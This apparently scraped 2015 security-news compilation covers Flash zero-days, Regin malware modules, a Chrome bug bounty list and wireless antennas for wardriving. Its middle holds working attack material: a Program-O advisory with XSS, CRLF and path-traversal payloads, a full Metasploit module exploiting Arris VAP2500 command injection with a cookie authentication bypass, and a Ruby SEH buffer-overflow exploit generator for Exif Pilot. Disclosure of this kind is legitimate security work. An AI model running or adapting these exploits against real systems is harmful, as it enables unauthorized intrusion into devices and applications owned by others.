when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user’s Web browser. JavaScript code could be supplied by the user in the "continue" request parameter of the URL, which allowed XSS attacks. Patching the vulnerability on the 17th day after reported to the company shows the search engine giant’s concern to secure its software and users as well. However, the recent vulnerability troubles visited Microsoft exposed one-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 operating systems, reported by Google’s Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after a three-month-long time period provided to the company. Source

UPDATE–Adobe has released an emergency update for Flash to address a zero-day vulnerability that is being actively exploited. The company also is looking into reports of exploits for a separate Flash bug not fixed in the new release, which is being used in attacks by the Angler exploit kit. The vulnerability that Adobe patched Thursday is under active attack, but Adobe officials said that this flaw is not the one that security researcher Kafeine said Wednesday was being used in the Angler attacks. “Adobe has released security updates for Adobe Flash Player for Windows, Macintosh and Linux. These updates address a vulnerability that could be used to circumvent memory randomization mitigations on the Windows platform,” Adobe said in its advisory. “Adobe is aware of reports that an exploit for CVE-2015-0310 exists in the wild, which is being used in attacks against older versions of Flash Player. Additionally, we are investigating reports that a separate exploit for Flash Player 16.0.0.287 and earlier also exists in the wild.” The patch for Flash comes just a day after Kafeine disclosed that some instances of the Angler exploit kit contained an exploit for a previously unknown vulnerability in the software. Adobe officials said Wednesday that they were investigating the reports. Kafeine initially saw Angler attacking the latest version of Flash in IE on Windows XP, Vista, 7 and 8, but said the exploit wasn’t being used against Chrome or Firefox. On Thursday he said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns. “One last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well,” Kafeine said. Adobe late on Thursday said that it plans to release a patch for the second zero-day flaw in Flash–the one being used by the Angler exploit kit–next week, but did not specify an exact release date. The vulnerability affects the latest versions of Flash. “A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said in an advisory. “We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.” Angler is among the more dangerous exploit kits being used right now and the group behind the kit often has exploits for Flash vulnerabilities within days of a new Adobe patch being published. Adobe officials did not say whether there is an update in the works for the zero-day vulnerability. Source

The Regin malware platform used to steal secrets from government agencies, banks and GSM network operators caught the attention of security experts who called it one of the most advanced attack platforms that has been studied, surpassing Flame, Duqu, even Stuxnet. Researchers at Kaspersky Lab said Regin could be tuned to attack large organizations or even individuals, pointing out that noted cryptographer Jean Jacques Quisquater was one of its first public victims. Today, details about a pair of Regin modules were released by Kaspersky’s Global Research and Analysis Team, one module used for lateral movement, while the other establishes a backdoor in order to move data off compromised machines. The researchers, Costin Raiu and Igor Soumenkov, concede that the modules, named Hopscotch and Legspin, have likely been put out of commission by those responsible for Regin and replaced by new modules. Attribution, meanwhile, remains another mystery to Regin, though some were quick to pin either the U.S. National Security Agency, or the U.K.’s GCHQ as the perpetrators. Regin was revealed in November by Kaspersky Lab, which said it has been detected on Windows computers belonging to 27 organizations in 14 countries, most of those in Asia and the Middle East. The GSM (Global System for Mobile Communication) characteristic to Regin is a relatively unique feature to APT-style attacks, and particularly concerning given the lax security used in mobile communication protocols. The attackers were able to steal credentials from an internal GSM Base Station Controller belonging to a large telecom operator that gave them access to GSM cells in that particular network, Kaspersky Lab said. Base Station Controllers manage calls as they move along a mobile network, allocating resources and mobile data transfers. With this kind of access, the attackers knew information about calls processed by particular cells, and were able to redirect calls, activate other cells and steal data. “At the present time, the attackers behind Regin are the only ones known to have been capable of doing such operations,” Raiu said at the time. Today’s report provides an in depth analysis of two of four modules belonging to Regin (hashes, compile dates, file type and size are listed on the Securelist blog). “Despite the overall sophistication (and sometimes even over-engineering) of the Regin platform, these tools are simple, straightforward and provide interactive console interfaces for Regin operators,” the researchers wrote. “What makes them interesting is the fact they were developed many years ago and could even have been created before the Regin platform itself.” Hopscotch, for example, is a standalone tool used by the attackers for lateral movement. It relies on stolen credentials to authenticate itself on remote computers, and contains no exploits, Raiu and Soumenkov said. “The module receives the name of the target machine and an optional remote file name from the standard input (operator),” Raiu and Soumenkov wrote. The attackers can choose from several options at the time of execution and the tool provides human-readable responses and suggestions for possible input.” The module creates a new service to launch a payload extracted from a remote server using a two-way encrypted channel, one that forwards input from the operator to the payload, the other writes data from payload to the standard output. The executable injects itself into a new process for persistence and the remote operator can interact with the module. “Once completed, the tool deletes the remote file and closes the authenticated sessions, effectively removing all the traces of the operation,” Raiu and Soumenkov wrote. Legspin is another standalone module; this one is a command line utility for computer administration, and operates as a backdoor. “It is worth noting that the program has full console support and features colored output when run locally,” Raiu and Soumenkov wrote. “It can even distinguish between consoles that support Windows Console API and TTY-compatible terminals that accept escape codes for coloring.” There are clues within the module that hint it was developed around 2002-2003; it also uses legacy API functions such as NetBIOS, which was deprecated from Windows with the launch of Vista. This module gives the remote attacker an interactive command prompt, and a long list of commands at their disposal, including the ability to retrieve and upload files, connect to a remote share, retrieve server configuration data, create processes, much more. “It’s worth pointing that not all Regin deployments contain the Legspin module; in most cases, the attackers manage their victims through other Regin platform functions,” the researchers wrote. “This means that Legspin could have been used independently from the Regin platform, as a simple backdoor together with an input/output wrapper.” Source

Google pushed out on Wednesday a new version of its Chrome browser (40.0.2214.91) and along with it paid out more than two dozen bounties, including 16 for memory corruption vulnerabilities. In all, 62 security vulnerabilities were patched, 17 of those considered high severity bugs by Google. Most of those high-severity vulnerabilities were memory corruption or use-after-free vulnerabilities in a number of Chrome components, including ICU, V8, FFmpeg and DOM. A researcher credited as cloudfuzzer cashed in with $12,000 worth of bounties, including three critical bugs. Another reporter known as yangdingning was awarded $9,000 for his finds. Here is the list of public vulnerabilities patched in Chrome 40. [$5000][430353] High CVE-2014-7923: Memory corruption in ICU. Credit to yangdingning. [$4500][435880] High CVE-2014-7924: Use-after-free in IndexedDB. Credit to Collin Payne. [$4000][434136] High CVE-2014-7925: Use-after-free in WebAudio. Credit to mark.buer. [$4000][422824] High CVE-2014-7926: Memory corruption in ICU. Credit to yangdingning. [$3500][444695] High CVE-2014-7927: Memory corruption in V8. Credit to Christian Holler. [$3500][435073] High CVE-2014-7928: Memory corruption in V8. Credit to Christian Holler. [$3000][442806] High CVE-2014-7930: Use-after-free in DOM. Credit to cloudfuzzer. [$3000][442710] High CVE-2014-7931: Memory corruption in V8. Credit to cloudfuzzer. [$2000][443115] High CVE-2014-7929: Use-after-free in DOM. Credit to cloudfuzzer. [$2000][429666] High CVE-2014-7932: Use-after-free in DOM. Credit to Atte Kettunen of OUSPG. [$2000][427266] High CVE-2014-7933: Use-after-free in FFmpeg. Credit to aohelin. [$2000][427249] High CVE-2014-7934: Use-after-free in DOM. Credit to cloudfuzzer. [$2000][402957] High CVE-2014-7935: Use-after-free in Speech. Credit to Khalil Zhani. [$1500][428561] High CVE-2014-7936: Use-after-free in Views. Credit to Christoph Diehl. [$1500][419060] High CVE-2014-7937: Use-after-free in FFmpeg. Credit to Atte Kettunen of OUSPG. [$1000][416323] High CVE-2014-7938: Memory corruption in Fonts. Credit to Atte Kettunen of OUSPG. [$1000][399951] High CVE-2014-7939: Same-origin-bypass in V8. Credit to Takeshi Terada. [$1000][433866] Medium CVE-2014-7940: Uninitialized-value in ICU. Credit to miaubiz. [$1000][428557] Medium CVE-2014-7941: Out-of-bounds read in UI. Credit to Atte Kettunen of OUSPG and Christoph Diehl. [$1000][426762] Medium CVE-2014-7942: Uninitialized-value in Fonts. Credit to miaubiz. [$1000][422492] Medium CVE-2014-7943: Out-of-bounds read in Skia. Credit to Atte Kettunen of OUSPG. [$1000][418881] Medium CVE-2014-7944: Out-of-bounds read in PDFium. Credit to cloudfuzzer. [$1000][414310] Medium CVE-2014-7945: Out-of-bounds read in PDFium. Credit to cloudfuzzer. [$1000][414109] Medium CVE-2014-7946: Out-of-bounds read in Fonts. Credit to miaubiz. [$500][430566] Medium CVE-2014-7947: Out-of-bounds read in PDFium. Credit to fuzztercluck. [$500][414026] Medium CVE-2014-7948: Caching error in AppCache. Credit to jiayaoqijia. Google said it awarded an additional $35,000 in bounties to Atte Kettunen of OUSPG, Christian Holler, cloudfuzzer and Khalil Zhani for work done during the development cycle to keep vulnerabilities out of the stable release. This is the first Chrome release of the year; in November, Chrome 39 was released and included removal of support for the fallback to SSL 3.0, the target of the POODLE attack. Source

Document Title: =============== Program-O v2.4.6 - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1414 Release Date: ============= 2015-01-21 Vulnerability Laboratory ID (VL-ID): ==================================== 1414 Common Vulnerability Scoring System: ==================================== 6.3 Product & Service Introduction: =============================== Welcome to the Program O Project website This is the home of the Open Source PHP MySQL AIML Chatbot Project. Program O is an AIML engine written in PHP with MySQL. Here you can find support, help, bot addons, a brilliant and friendly community and ofcourse the Program O download files. (Copy of the Vendor Homepage: http://blog.program-o.com/ ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the official Program-O v2.4.6 web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-21: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Program O Product: Program O AIML Chatbot - Web Application 2.4.6 Exploitation Technique: ======================= Remote Severity Level: =============== High Proof of Concept (PoC): ======================= 1.1 Client-Side Cross Site Scripting Vulnerability The xss vulnerabilities can be exploited by remote attackers without privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. http://localhost/Program-O/gui/xml/index.php?convo_id=444%22/%3E%3Csvg/onload=alert%281%29%3E Cause echo $convo_id; $post_vars = filter_input_array(INPUT_POST) : array(); $get_vars = filter_input_array(INPUT_GET) : array(); $request_vars = array_merge($get_vars, $post_vars); $convo_id = $request_vars['convo_id'] : get_convo_id (); 1.2 Client-Side Cross Site Scripting Vulnerability http://localhost/Program-O/gui/xml/index.php/%22%3E%3Csvg/onload=alert%280%29%3E ./Program-O/gui/xml/index.php echo $_SERVER['PHP_SELF']; 3. /logs/index.php $iframeURL = $_POST['file'] : 'about:blank'; echo $iframeURL; <form action="http://localhost/Program-O/logs/index.php" method="POST"> <input type="hidden" name="file" value='paulos"/></iframe></div><svg/onload=alert(0)>'> 2.1 Application-Side Cross Site Scripting Vulnerability The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. /admin/validateAIML.php cause because of echo $status; $status = "File $fileName is valid.<br />\n"; giving valid AIML files names like <svg/onload=alert(0)> should do the trick 2.2 Application-Side Cross Site Scripting Vulnerability (Only in older php server versions) /admin/file.php print "File <strong>$req_file</strong> doesn't exist."; $req_file = basename($_GET['file']); exploit ?file=">>payload 3. File Manipulation - Local File Include The local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. /admin/validateAIML.php Cause because of, move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) $target = $uploadDir . $ip . '/' . $tf; $uploadDir = _UPLOAD_PATH_; define('_UPLOAD_PATH_', _CONF_PATH_ . 'uploads' . $path_separator); // global_config.php define() define('_CONF_PATH_', _BASE_PATH_ . 'config' . $path_separator); // global_config.php define() define('_BASE_PATH_', $parentFolder); // global_config.php define() Exploitation is to give your file(s) names like ../../../file so when they got uploaded, they can cause LFI 4. LFI, File Manipulation (RCE in some special cases only!) The local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. /admin/upload_old.php move_uploaded_file($_FILES['aimlfile']['tmp_name'], $file)) $file = './uploads/' . $_FILES['aimlfile']['name']; exact same issues in admin/upload.php 5.1 HTTP Response Splitting (CRLF) The HTTP Response Splitting issues can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. header("Refresh: 5; url=$whoami?file=$req_file&send_file=yes"); $whoami = basename(__FILE__); $req_file = basename($_GET['file']); 5.2 HTTP Response Splitting (CRLF) /admin/download.php cause, $referer = $_SERVER['HTTP_REFERER']; header("Refresh: 5; url=file.php?file=$zipFilename&send_file=yes&referer=$referer&msg=$msg"); So as long as we spoof our referer to %0A%0DContent-Injection:goes-here Security Risk: ============== 1.1 - 1.2 The security risk of the client-side cross site scripting vulnerabilities is estimated as medium. (CVSS 2.6) 2.1 - 2.2 The security risk of the application-side input validation web vulnerabilities are estimated as medium. (CVSS 3.7) 3.0 The security risk of the local file include web vulnerability is estimated as high. (CVSS 6.1) 4.0 The security risk of the local file manipulation issue and code execution vulnerability is estimated as high. (CVSS 6.4). Credits & Authors: ================== Paulos Yibelo (paulosyibelo.com) Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source

#!/usr/bin/env ruby # Exploit Title: Exif Pilot SEH Based Buffer Overflow # Version: version 4.7.2 # Download: http://www.colorpilot.com/load/exif.exe # Tested on: Windows XP sp2 # Exploit Author: Osanda M. Jayathissa # E-Mail: osanda[cat]unseen.is =begin Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml". The p/p/r addresses contains null characters. =end require 'rex' def generate_content(padding1_len, padding2_len) header = "\xff\xfe" header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode("<efls>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode(" <eflitem>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode(" <maker>"); header << Rex::Text.to_unicode(""); for i in 0..padding1_len header << Rex::Text.to_unicode("A"); end header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH header << Rex::Text.to_unicode("CCCC"); #SEH for i in 0..padding2_len header << Rex::Text.to_unicode("A"); end header << "\x0d\x00\x0a\x00\x09\x00\x09\x00" header << Rex::Text.to_unicode(" </maker>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode(" <model>abc</model>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode(" <factor>0.000000</factor>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode(" </eflitem>") header << "\x0d\x00\x0a\x00" header << Rex::Text.to_unicode("</efls>") header << "\x0d\x00\x0a\x00" return header end ## # main ## filename = 'output.xml' output_handle = File.new(filename, 'wb') if !output_handle $stdout.puts "Cannot open the file #{filename} for writing!" exit -1 end header = generate_content(1619, 7000) $stdout.puts "Generating file #{filename}" output_handle.puts header output_handle.close $stdout.puts "Done!" exit 0 #EOF Source

Introduction Wardriving is an activity in which a person seeks wireless access points in moving vehicles with high gain antennas mounted on the top. Usually, this access point data is correlated with GPS positions and marked on publicly accessible maps such as WiGLE. On the other hand, wireless penetration tests are focused evaluations of wireless security pertaining to an organization. In both of these cases—and any type of wireless communication—antennas play a critical role. They can mean the difference between hassle-free communication and bitter frustration. However, antenna designs and related implications are arcane topics in requirement of sincere exploration by security enthusiasts. The antennas in your arsenal can make or break your wardriving or wireless penetration testing efforts. Whether you are a wardriving aficionado or a wireless penetration tester, this paper is intended to help you deduce the best antenna for your requirements. Terminology You Should Know Wi-Fi operates in the 2.4 GHz radio frequency that is measured in decibels or db. In order to be able to comprehend discussions germane to the performance of antennas, you must familiarize yourself with the following terms: dBm – dBm means decibel milliwatts. Wi-Fi network signal levels are usually measured using dBm. The negative sign is used because the transmission power is never strong enough for the signal level to be positive. For instance, to get a 0.00 dBm signal, you would need a transmission power of 0.001 watts. -30 dBm- Maximum possible value; you are right next to the access point (within a few feet). -67 dBm- Minimum requirement for timely packet delivery (e.g. for VoIP or video streaming). -70 dBm- Minimum requirement for reliable packet delivery (e.g. for web surfing). -80 dBm- Minimum requirement for maintaining a basic connection; you will experience some packet drops. -90 dBm- Barely able to maintain a connection; SNR is low; functionality is severely impaired. Link Quality: Simply stated, link quality is indicative of the SNR (Signal to Noise Ratio), which is a measurement of interference versus the strength of your ‘point-to-point’ or ‘point-to-multipoint’ link. Accordingly, higher link quality will imply lower number of packet errors. Antenna Gain: Do not be confused by this term, the antenna does not actually amplify anything. Antenna gain is a figure that reflects how efficiently your receiving antenna would convert Wi-Fi radio waves into electrical power. Antennas with a gain of 2 dBi, 5 dBi, 7dBi, 9 dBi, 13 dBi etc are available. A common mistake is to think that the one with a high dBi would be the best (e.g. 13 dBi). To understand why this is a misconception, consider the following rough sketch [Figure 1]: As evident from this figure, a higher (9) dBi antenna is suitable for long horizontal ranges with the receiver and transmitter at roughly the same elevation. However, if the transmitter is placed vertically above the receiver—as in floors of a building—then a 5 dBi antenna would be your best bet. If the transmitter is at a different elevation and at a long distance from the receiver, a 7 dBi antenna would offer you the right combination of elevation and range. A 2 dBi antenna aims to cover signals equally in all directions, and is not well-suited for wireless penetration testing or wardriving. How well do these antennas work? The short answer is: If correctly chosen, they perform well. The right type of antenna, with proper orientation, is able to pick up signals from miles away. However, it is imperative to point out here that many users who purchase external antennas end up being dissatisfied with their performance. The reasons for this are: Unrealistic expectations: This may seem obvious but these antennas are not magical devices that will pick up signals from great distances, especially when they are improperly chosen (wrong type of antenna) or have not been calibrated (aligned) well. Insufficient knowledge: If you are purchasing a wireless antenna, or constructing a custom one, you should be able to define your purpose and have the knowledge to choose the proper antenna that would satisfy this purpose. To test how well an external antenna performs in contrast with a laptop’s default antenna under the same conditions, we set up the following experiment. The distance between the access point and our antennas was carefully chosen so that the internal antenna could barely receive a signal at this point. Interfaces: ‘wlan0?- internal antenna, ‘wlan1?- external antenna, omnidirectional, 5 dBi Distance between AP and antennas: 7.62 meters or 25 feet Obstructions: Two concrete walls and two trees We noticed that at this distance, using the internal antenna, we were barely able to ping the wireless router at 192.168.0.1. As evident from the roundtrip delay time of several milliseconds [Figure 2], the internal antenna was performing poorly and there were multiple packet drops. At the same distance, our standard 5 dBi omidirectional external antenna was able to outperform the internal antenna, as evident by the decreased roundtrip delay time [Figure 3]. Let us examine the performance of both antennas in terms of link quality and signal levels. For the internal antenna, both the link quality and the signal level were extremely poor [Figure 4]. We were able to obtain a reliable connection using the external antenna under same conditions [Figure 5]. These results indicate that there is a definite performance boost when an external antenna is used—how significant this boost is would depend on the suitability of the antenna for the receiving conditions. This brings us to the next section. Choosing the Right Type of Antenna There are a variety of antenna types, and each type is built with specific needs in mind. There is no “best antenna for wardriving or penetration testing”. Understanding the design and purpose of each of these would help you choose the best one. An omnidirectional antenna spreads energy equally in all directions—which means shorter range. A directional antenna is able to take this same energy and focus it towards a particular direction—implying longer range in that direction. Omni-Directional Antennas This is the most common antenna type, and most if not all of you have seen one up close. For instance, the antenna on top of your car is an omnidirectional antenna. These can be used for ‘point-to-multipoint’ purposes such as to serve as the wireless router antenna that transmits signals to all devices in the vicinity [Figure 6]. These are not suitable to be used for point-to-point communications because transmitting signals in all directions, when you want them to go from point A to point B, is an inefficient choice. Suitability for wardriving: These are ideally suited for wardriving, since they grab signals from all directions while you are driving. However, there are some considerations: a 9 dBi omnidirectional antenna would allow you to capture far off signals from all directions, but it will miss access points in high buildings close to your vehicle. To understand why, see Figure 1. Accordingly, it is advised that you choose the correct dBi omnidirectional antenna suited for the areas you are going to drive in. Suitability for penetration testing: During a penetration test, you are aware of your target. Hence, a directional antenna pointed toward the target is more efficient than an omnidirectional antenna. However, you can use a 5 dBi omnidirectional antenna during perimeter testing. Parabolic Antennas Parabolic antennas depend on a curved parabolic surface dish that focuses signals towards a central point [Figure 7]. This enables these antennas to put out incredible gains. However, parabolic antennas are highly directional, which means you need to ensure that they are pointed in the right direction, otherwise they might completely “shield” the signal. Because of their high gain, they are suitable for long range point to point communications. Suitability for wardriving: A parabolic antenna would pick up wireless signals from miles away but only from a single direction at a time. Hence, if you want to map Wi-Fi access points in multiple directions while driving, this is not the best choice. Suitability for penetration testing: Given their long range, parabolic antennas can be very suitable for targeted wireless intrusions, since they allow you to carry out tests from far away once you have positioned them toward target access points. Yagi Antennas Yagi antennas, named after Dr. Hidetsugu Yagi, have a central beam with many individual elements supported by this beam [Figure 8]. These elements constitute radiators and reflectors. A variation is the ‘Vagi’ antenna, which is comprised of two beams side by side. Suitability for wardriving: Yagi antennas are directional, which means they are not the best choice during wardriving. They would pick up far off signals from a particular direction, while missing out on signals in the other directions. Suitability for penetration testing: Like parabolic antennas, Yagi antennas are capable of picking up signals from miles away. Their high gain (e.g. 25 dBi) makes them ideal for penetration testing when you have them pointed towards the target. The Vagi antenna is an attractive choice for penetration testing since they are small and lightweight, yet offer substantial gains. Backfire antennas Backfire antennas are known to have a small size but a significant gain. This makes them a very attractive choice for point-to-point or point-to-multipoint communications. How do they differ from parabolic antennas? There is no parabola; the reflector surface is flat. Their resonant cavity structural design makes them capable of achieving the high gain. For suitability toward wardriving and penetration testing, see ‘Parabolic Antennas’. Building Your Own High Gain Antenna If you have followed this discussion on antennas so far, building your own antenna can be a fun exercise. For this, you will need: About 1-2 inch of 12 gauge copper wire or an omnidirectional antenna A smooth metallic parabolic reflector such as aluminum foil, a can, an 8 inch dumpling strainer, etc. How to Make a Cantenna Cantennas, antennas made out of cans, have been very popular among enthusiasts since they are easy to make and everything you need is in your home. The idea is to use a ‘Pringles’ or similar can, and introduce a copper wire near the bottom from the side of the can [Figure 9]. Calculations regarding the placement of the copper wire need to be precise. You can use this calculator to ensure accuracy. However, if the can is very narrow, you would need to point this antenna very precisely towards the signal direction and even then you would not notice significant gain. Moreover, if you are using a long cable, signals would suffer attenuation. Note: Although a Pringles can is often mentioned, it is not a good can to be used for these purposes since it is too narrow. In fact, any cantenna is a bad choice for serious penetration testing. How to Make a Parabolic Antenna If you have an omnidirectional antenna available [Figure 6], the task becomes easier. Now, all you need to do is find a parabolic reflector that can “turn” this omnidirectional antenna into a parabolic antenna. This parabolic reflector can be any smooth metallic surface that can converge radio signals over the omnidirectional antenna—and this is what improves the antenna gain [Figure 10]. Accurate placement of the omnidirectional antenna in front of the parabolic reflector is of prime significance. There is no increase in antenna gain if an inexperienced person has placed the omnidirectional antenna too far or too close to the parabolic reflector so that it completely misses the focal point. Hence, for accuracy, use this parabolic antenna focal point calculator. Alternatively, if you prefer to avoid making calculations, you can use freely available parabolic reflector templates which have been drawn to scale. These templates explicitly mark the focal point of the parabolic reflector so that you do not have to make calculations. For instance, you can print and use the parabolic reflector template in Figure 11. You would need a square sheet of reflective material that you can place vertically on the straight line drawn in this template, and bend the sheet until it synchronizes with the parabolic curve in the template. Notice the marked focal point (black spot) in the template; place the omnidirectional antenna at that point. Note: We have discussed making parabolic reflectors; however, if you want to build a 2.4 GHz omnidirectional antenna from scratch, it can get quite convoluted. You can follow this link to build such an omnidirectional antenna. Comparison to Commercial Antennas These homemade antennas are capable of giving you results as good as commercial antennas. However, you need to be accurate while building these. Imprecise measurements, design flaws, or implementation errors would result in inefficient antennas with no significant gain. Turning Your Laptop’s Internal Antenna to an External Antenna In case you have some 5 or 7 dBi antennas from your old wireless router lying around [Figure 6], and you want to avoid purchasing a USB antenna unit, you can attach these to your laptop’s built-in internal antenna unit. For this, you will need: U.FL male to RP-SMA pigtail cable Knowledge of laptop disassembly and assembly, and relevant tools Any 2.4 GHz antenna [Figure 6] You would need to disassemble your laptop using required tools and locate the auxiliary antenna connector on the motherboard [Figure 12]. The U.FL side of the cable would fit into this auxiliary connector, and the other side should be fixed along the laptop’s edges such that you can attach your 2.4 GHz external antenna to this SMA (SubMiniature version A) end. Detriments to Wireless Signals Even with the right type of antenna, you may experience weak connections characterized by frequent packet drops and delays. In these situations, one or more of these factors may be the cause: Distance: The most obvious reason is that you are too far from the transmitter. Signals get attenuated over long distances, especially when omnidirectional transmitters are being used, such as those used by common wireless routers. Weather: If an efficient transmitting antenna is being used at the right frequency, weather would have little effect on wireless signals. However, rain can absorb radio signals and enervate Wi-Fi signals at 2.4 GHz. Objects in path: Signals at 2.4 GHz frequency need a clear ‘line-of-sight’ for efficient propagation. This means that trees and walls act as obstructions to the wireless signal. Other access points – If there are other APs in the vicinity that are working on the same channel in crowded areas, this would cause substantial disturbance. Conclusion Wardriving is not illegal as long as you are aware of your limits and avoid nefarious activities such as cracking encryption, retrieving access point passwords, and accessing the Internet for free—known as Piggybacking. For wardriving, you can use a 7 dBi omnidirectional antenna placed on top of your vehicle using a magnetic-mount. For wireless penetration testing scenarios in which you want to breach the security of a particular establishment, it is best to use parabolic reflectors pointed towards the target. Depending on the conditions, these parabolic antennas would allow you carry out wireless penetration tests from a long distance which would lower the risk of being noticed by security personnel. Furthermore, using high gain directional antennas, you are able to ascertain how close to the target perimeter would the potential attackers need to be in order to intrude on wireless communications. A 5 or 7 dBi omnidirectional antenna can be used while testing premises for the presence of rogue access points. References [1] M. Erskine. (2002-2003) www.freeantennas.com. [Online]. Parabolic Templat [2] Tim Pozar. Late Night Software. [Online]. Slide 1 [3] R. Dean Straw, L. B. Cebik, and Dave Hallidy, Eds., ARRL Antenna Book, 22nd ed.: The American Radio Relay League, Inc., October 2011. [4] Frank Thornton Russ Rogers, “Understanding Antennas and Antenna Theory,” in WarDriving and Wireless Penetration Testing.: Syngress, 2007, ch. 2, pp. 31-59. Source